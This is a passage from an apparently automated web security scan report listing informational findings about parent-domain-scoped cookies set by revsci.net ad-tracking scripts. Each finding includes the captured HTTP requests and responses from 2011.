11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/KhsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/304415100.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F04%252Fus-weather-football-idUSTRE78222D20110904%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4es3kaxW1feYH1YNm+vskrklkV+oIYNjONkByQANVsWNKqFQO5wXMuBl7LrFt9VvH8daQXgvCcc/xZFhpDSH3U4HVbBCIoq/8l/NhnpvaGiiSSrZ8kLGKEIhEwyeTfwOOT0SH98jWN4RywPgioVk8tTltp1p0UlKh8pgAGbJtLLHkzZlncToQPlWxsAy98jyGBAAGwnO3E3u1CL1AuqIBOad2NbOMmZnVBuDsFEtCusRTpf/eP/rfkboM67xVj/XJhGJYPg+W1/zwFI+aFZufGfL+/Z2SQplGqOPI3tNqk8XcE/ujqbTMA1byRkoOorO0+utOKrV87/bLRlYgLprcZr9jfXUBea5L0E99DIw7QmAt9edXA+GWvypoqWxSb7VjYfhviS1vMgyxtybpLpHkmK1YEkJDfxQLh8YRaLfzKLz9BGeRcG/pbGfe3l2iiQU9uA+5pAvvp0MUzDDsQe9Sxw2VU8g6kwqJaqi1jlhlid2LSxhnMJEYMo1sSEx1lsTmfmwdqW4L5W4G6MvPfoCl8AxFxP3k/qZn7W1GCq/vqvjZaJnVKmB9Hclql4FSg2qEI3GVbWPBpVcLHgkPV4kOsfhpa2otVl8jHM7XiwUaaHqTtyjHssQJ17jWcQW5bImC3mymJMwAsGhRzzFoHqEDMZQHWG0FCAaf0r/KQ29FcsMtODjzAtYrezVobTBqbH0qnPV8opyGyzm/uyJoXbzFgdk/tQ6w/7qGwbFrT2Z9Y73puC4yVjAfoDfL6udmM8uk3wTJPMW7M2qrSoxIM+ISFCWM2S3FH+8zXSctZMYCpANgDpbjA3qEy0TwLAonkipN1YQag6ZCxVL+vqRh6ruSTB1r70g=="; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spZQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yNA1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ymBV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UZSm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jxkC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_U-2H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MHAh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mC_w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hJ1L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a0q5=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CGuf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vcWj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UeD7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NZMh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gtXn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Gz72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I_s8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Yae=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_13QU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yd99=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kx93=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vjxv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i6y7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ci3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BIfh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hlh0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
